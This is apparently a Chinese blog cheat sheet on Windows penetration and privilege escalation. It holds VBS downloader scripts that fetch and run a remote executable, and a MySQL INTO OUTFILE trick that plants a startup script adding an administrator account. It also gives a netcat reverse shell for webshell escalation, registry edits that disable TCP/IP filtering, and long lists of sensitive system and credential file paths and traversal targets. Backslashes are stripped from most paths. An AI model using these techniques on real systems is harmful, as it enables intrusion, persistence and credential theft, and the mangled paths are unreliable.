WINDOWS渗透与提权总结(2)

vbs 下载者：

01
1：

02
 
03
echo Set sGet = createObject("ADODB.Stream") >>c:windowscftmon.vbs

04
 
05
echo sGet.Mode = 3 >>c:windowscftmon.vbs

06
 
07
echo sGet.Type = 1 >>c:windowscftmon.vbs

08
 
09
echo sGet.Open() >>c:windowscftmon.vbs

10
 
11
echo sGet.Write(xPost.responseBody) >>c:windowscftmon.vbs

12
 
13
echo sGet.SaveToFile "c:windowse.exe",2 >>c:windowscftmon.vbs

14
 
15
echo Set objShell = CreateObject("Wscript.Shell") >>c:windowscftmon.vbs

16
 
17
echo objshell.run """c:windowse.exe""" >>c:windowscftmon.vbs

18
 
19
cftmon.vbs

2：

01
On Error Resume Next:Dim iRemote,iLocal,s1,s2

02
 
03
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))

04
 
05
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"

06
 
07
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()

08
 
09
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()

10
 
11
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

12
 
13
cscript c:down.vbs http://xxxx/mm.exe c:mm.exe

14
create table a (cmd text)：

1
insert into a values ("set wshshell=createobject (""wscript.shell"")");

2
 
3
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

4
 
5
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

6
 
7
select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";

Cmd 下目录的操作技巧：

列出d的所有目录：

1
for /d %i in (d:freehost*) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的显示出来：

1
for /d %i in (???) do @echo %i

以当前目录为搜索路径，把当前目录与下面的子目录的全部EXE文件列出：

1
for /r %i in (*.exe) do @echo %i

以指定目录为搜索路径，把当前目录与下面的子目录的所有文件列出：

1
for /r "f:freehosthmadesignweb" %i in (*.*) do @echo %i

这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中：

1
for /f %i in (c:1.txt) do echo %i

delims=后的空格是分隔符，tokens是取第几个位置：

1
for /f "tokens=2 delims= " %i in (a.txt) do echo %i

Windows 系统下的一些常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）：

001
c:windowsphp.ini

002
 
003
c:oot.ini

004
 
005
c:1.txt

006
 
007
c:a.txt

008
 
009
c:CMailServerconfig.ini

010
 
011
c:CMailServerCMailServer.exe

012
 
013
c:CMailServerWebMailindex.asp

014
 
015
c:program filesCMailServerCMailServer.exe

016
 
017
c:program filesCMailServerWebMailindex.asp

018
 
019
C:WinWebMailSysInfo.ini

020
 
021
C:WinWebMailWebdefault.asp

022
 
023
C:WINDOWSFreeHost32.dll

024
 
025
C:WINDOWS7i24iislog4.exe

026
 
027
C:WINDOWS7i24tool.exe

028
 
029
c:hzhostdatabasesurl.asp

030
 
031
c:hzhosthzclient.exe

032
 
033
C:Documents and SettingsAll Users「开始」菜单程序7i24虚拟主机管理平台自动设置[受控端].lnk

034
 
035
C:Documents and SettingsAll Users「开始」菜单程序Serv-UServ-U Administrator.lnk

036
 
037
C:WINDOWSweb.config

038
 
039
c:webindex.html

040
 
041
c:wwwindex.html

042
 
043
c:WWWROOTindex.html

044
 
045
c:websiteindex.html

046
 
047
c:webindex.asp

048
 
049
c:wwwindex.asp

050
 
051
c:wwwsiteindex.asp

052
 
053
c:WWWROOTindex.asp

054
 
055
c:webindex.php

056
 
057
c:wwwindex.php

058
 
059
c:WWWROOTindex.php

060
 
061
c:WWWsiteindex.php

062
 
063
c:webdefault.html

064
 
065
c:wwwdefault.html

066
 
067
c:WWWROOTdefault.html

068
 
069
c:websitedefault.html

070
 
071
c:webdefault.asp

072
 
073
c:wwwdefault.asp

074
 
075
c:wwwsitedefault.asp

076
 
077
c:WWWROOTdefault.asp

078
 
079
c:webdefault.php

080
 
081
c:wwwdefault.php

082
 
083
c:WWWROOTdefault.php

084
 
085
c:WWWsitedefault.php

086
 
087
C:Inetpubwwwrootpagerror.gif

088
 
089
c:windows
otepad.exe

090
 
091
c:winnt
otepad.exe

092
 
093
C:Program FilesMicrosoft OfficeOFFICE10winword.exe

094
 
095
C:Program FilesMicrosoft OfficeOFFICE11winword.exe

096
 
097
C:Program FilesMicrosoft OfficeOFFICE12winword.exe

098
 
099
C:Program FilesInternet ExplorerIEXPLORE.EXE

100
 
101
C:Program Fileswinrar
ar.exe

102
 
103
C:Program Files360360Safe360safe.exe

104
 
105
C:Program Files360Safe360safe.exe

106
 
107
C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log

108
 
109
c:
avbinstore.ini

110
 
111
c:
ising.ini

112
 
113
C:Program FilesRisingRavRsTask.xml

114
 
115
C:Documents and SettingsAll UsersStart Menudesktop.ini

116
 
117
C:Documents and SettingsAdministratorMy DocumentsDefault.rdp

118
 
119
C:Documents and SettingsAdministratorCookiesindex.dat

120
 
121
C:Documents and SettingsAdministratorMy Documents新建 文本文档.txt

122
 
123
C:Documents and SettingsAdministrator桌面新建 文本文档.txt

124
 
125
C:Documents and SettingsAdministratorMy Documents1.txt

126
 
127
C:Documents and SettingsAdministrator桌面1.txt

128
 
129
C:Documents and SettingsAdministratorMy Documentsa.txt

130
 
131
C:Documents and SettingsAdministrator桌面a.txt

132
 
133
C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg

134
 
135
E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm

136
 
137
C:Program FilesRhinoSoft.comServ-UVersion.txt

138
 
139
C:Program FilesRhinoSoft.comServ-UServUDaemon.ini

140
 
141
C:Program FilesSymantecSYMEVENT.INF

142
 
143
C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe

144
 
145
C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf

146
 
147
C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf

148
 
149
C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf

150
 
151
C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm

152
 
153
C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT

154
 
155
C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll

156
 
157
C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini

158
 
159
C:MySQLMySQL Server 5.0my.ini

160
 
161
C:Program FilesMySQLMySQL Server 5.0my.ini

162
 
163
C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm

164
 
165
C:Program FilesMySQLMySQL Server 5.0COPYING

166
 
167
C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql

168
 
169
C:Program FilesMySQLMySQL Server 4.1inmysql.exe

170
 
171
c:MySQLMySQL Server 4.1inmysql.exe

172
 
173
c:MySQLMySQL Server 4.1datamysqluser.frm

174
 
175
C:Program FilesOracleoraconfigLpk.dll

176
 
177
C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe

178
 
179
C:WINDOWSsystem32inetsrvw3wp.exe

180
 
181
C:WINDOWSsystem32inetsrvinetinfo.exe

182
 
183
C:WINDOWSsystem32inetsrvMetaBase.xml

184
 
185
C:WINDOWSsystem32inetsrviisa, dmpwdachg.asp

186
 
187
C:WINDOWSsystem32configdefault.LOG

188
 
189
C:WINDOWSsystem32configsam

190
 
191
C:WINDOWSsystem32configsystem

192
 
193
c:CMailServerconfig.ini

194
 
195
c:program filesCMailServerconfig.ini

196
 
197
c:	omcat6	omcat6inversion.sh

198
 
199
c:	omcat6inversion.sh

200
 
201
c:	omcatinversion.sh

202
 
203
c:program files	omcat6inversion.sh

204
 
205
C:Program FilesApache Software FoundationTomcat 6.0inversion.sh

206
 
207
c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log

208
 
209
c:Apache2Apache2inApache.exe

210
 
211
c:Apache2inApache.exe

212
 
213
c:Apache2phplicense.txt

214
 
215
C:Program FilesApache GroupApache2inApache.exe

216
 
217
c:Program FilesQQ2007qq.exe

218
 
219
c:Program FilesTencent\, qqUser.db

220
 
221
c:Program FilesTencentqqqq.exe

222
 
223
c:Program FilesTencentqqinqq.exe

224
 
225
c:Program FilesTencentqq2009qq.exe

226
 
227
c:Program FilesTencentqq2008qq.exe

228
 
229
c:Program FilesTencentqq2010inqq.exe

230
 
231
c:Program FilesTencentqqUsersAll UsersRegistry.db

232
 
233
C:Program FilesTencentTMTMDllsQQZip.dll

234
 
235
c:Program FilesTencentTmBinTxplatform.exe

236
 
237
c:Program FilesTencentRTXServerAppConfig.xml

238
 
239
C:Program FilesFoxmalFoxmail.exe

240
 
241
C:Program FilesFoxmalaccounts.cfg

242
 
243
C:Program Files	encentFoxmalFoxmail.exe

244
 
245
C:Program Files	encentFoxmalaccounts.cfg

246
 
247
C:Program FilesLeapFTP 3.0LeapFTP.exe

248
 
249
C:Program FilesLeapFTPLeapFTP.exe

250
 
251
c:Program FilesGlobalSCAPECuteFTP Procftppro.exe

252
 
253
c:Program FilesGlobalSCAPECuteFTP Pro
otes.txt

254
 
255
C:Program FilesFlashFXPFlashFXP.ini

256
 
257
C:Program FilesFlashFXPflashfxp.exe

258
 
259
c:Program FilesOraclein
egsvr32.exe

260
 
261
c:Program Files腾讯游戏QQGAME
eadme.txt

262
 
263
c:Program Files	encent腾讯游戏QQGAME
eadme.txt

264
 
265
c:Program Files	encentQQGAME
eadme.txt

266
 
267
C:Program FilesStormIIStorm.exe

各种网站的配置文件相对路径大全：

001
/config.php

002
 
003
../../config.php

004
 
005
../config.php

006
 
007
../../../config.php

008
 
009
/config.inc.php

010
 
011
./config.inc.php

012
 
013
../../config.inc.php

014
 
015
../config.inc.php

016
 
017
../../../config.inc.php

018
 
019
/conn.php

020
 
021
./conn.php

022
 
023
../../conn.php

024
 
025
../conn.php

026
 
027
../../../conn.php

028
 
029
/conn.asp

030
 
031
./conn.asp

032
 
033
../../conn.asp

034
 
035
../conn.asp

036
 
037
../../../conn.asp

038
 
039
/config.inc.php

040
 
041
./config.inc.php

042
 
043
../../config.inc.php

044
 
045
../config.inc.php

046
 
047
../../../config.inc.php

048
 
049
/config/config.php

050
 
051
../../config/config.php

052
 
053
../config/config.php

054
 
055
../../../config/config.php

056
 
057
/config/config.inc.php

058
 
059
./config/config.inc.php

060
 
061
../../config/config.inc.php

062
 
063
../config/config.inc.php

064
 
065
../../../config/config.inc.php

066
 
067
/config/conn.php

068
 
069
./config/conn.php

070
 
071
../../config/conn.php

072
 
073
../config/conn.php

074
 
075
../../../config/conn.php

076
 
077
/config/conn.asp

078
 
079
./config/conn.asp

080
 
081
../../config/conn.asp

082
 
083
../config/conn.asp

084
 
085
../../../config/conn.asp

086
 
087
/config/config.inc.php

088
 
089
./config/config.inc.php

090
 
091
../../config/config.inc.php

092
 
093
../config/config.inc.php

094
 
095
../../../config/config.inc.php

096
 
097
/data/config.php

098
 
099
../../data/config.php

100
 
101
../data/config.php

102
 
103
../../../data/config.php

104
 
105
/data/config.inc.php

106
 
107
./data/config.inc.php

108
 
109
../../data/config.inc.php

110
 
111
../data/config.inc.php

112
 
113
../../../data/config.inc.php

114
 
115
/data/conn.php

116
 
117
./data/conn.php

118
 
119
../../data/conn.php

120
 
121
../data/conn.php

122
 
123
../../../data/conn.php

124
 
125
/data/conn.asp

126
 
127
./data/conn.asp

128
 
129
../../data/conn.asp

130
 
131
../data/conn.asp

132
 
133
../../../data/conn.asp

134
 
135
/data/config.inc.php

136
 
137
./data/config.inc.php

138
 
139
../../data/config.inc.php

140
 
141
../data/config.inc.php

142
 
143
../../../data/config.inc.php

144
 
145
/include/config.php

146
 
147
../../include/config.php

148
 
149
../include/config.php

150
 
151
../../../include/config.php

152
 
153
/include/config.inc.php

154
 
155
./include/config.inc.php

156
 
157
../../include/config.inc.php

158
 
159
../include/config.inc.php

160
 
161
../../../include/config.inc.php

162
 
163
/include/conn.php

164
 
165
./include/conn.php

166
 
167
../../include/conn.php

168
 
169
../include/conn.php

170
 
171
../../../include/conn.php

172
 
173
/include/conn.asp

174
 
175
./include/conn.asp

176
 
177
../../include/conn.asp

178
 
179
../include/conn.asp

180
 
181
../../../include/conn.asp

182
 
183
/include/config.inc.php

184
 
185
./include/config.inc.php

186
 
187
../../include/config.inc.php

188
 
189
../include/config.inc.php

190
 
191
../../../include/config.inc.php

192
 
193
/inc/config.php

194
 
195
../../inc/config.php

196
 
197
../inc/config.php

198
 
199
../../../inc/config.php

200
 
201
/inc/config.inc.php

202
 
203
./inc/config.inc.php

204
 
205
../../inc/config.inc.php

206
 
207
../inc/config.inc.php

208
 
209
../../../inc/config.inc.php

210
 
211
/inc/conn.php

212
 
213
./inc/conn.php

214
 
215
../../inc/conn.php

216
 
217
../inc/conn.php

218
 
219
../../../inc/conn.php

220
 
221
/inc/conn.asp

222
 
223
./inc/conn.asp

224
 
225
../../inc/conn.asp

226
 
227
../inc/conn.asp

228
 
229
../../../inc/conn.asp

230
 
231
/inc/config.inc.php

232
 
233
./inc/config.inc.php

234
 
235
../../inc/config.inc.php

236
 
237
../inc/config.inc.php

238
 
239
../../../inc/config.inc.php

240
 
241
/index.php

242
 
243
./index.php

244
 
245
../../index.php

246
 
247
../index.php

248
 
249
../../../index.php

250
 
251
/index.asp

252
 
253
./index.asp

254
 
255
../../index.asp

256
 
257
../index.asp

258
 
259
../../../index.asp

去除TCP IP筛选：

TCP/IP筛选在注册表里有三处，分别是：

1
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip

2
 
3
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

4
 
5
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

分别用以下命令来导出注册表项：

1
regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

2
 
3
regedit -e D:.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

4
 
5
regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

然后再把三个文件里的：

1
“EnableSecurityFilters"=dword:00000001”

改为：

1
“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可：

1
regedit -s D:a.reg

2
 
3
regedit -s D:.reg

4
 
5
regedit -s D:c.reg

Webshell 提权小技巧：

Cmd路径：

1
c:windows	empcmd.exe

Nc 也在同目录下，例如反弹cmdshell：

1
"c:windows	emp
c.exe -vv ip 999 -e c:windows	empcmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入：

1
c:windows	emp
c.exe

命令输入：

1
-vv ip 999 -e c:windows	empcmd.exe

却能成功。。这个不是重点

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

命令行调用 RAR 打包：

1
rar a -k -r -s -m3 c:1.rar c:folde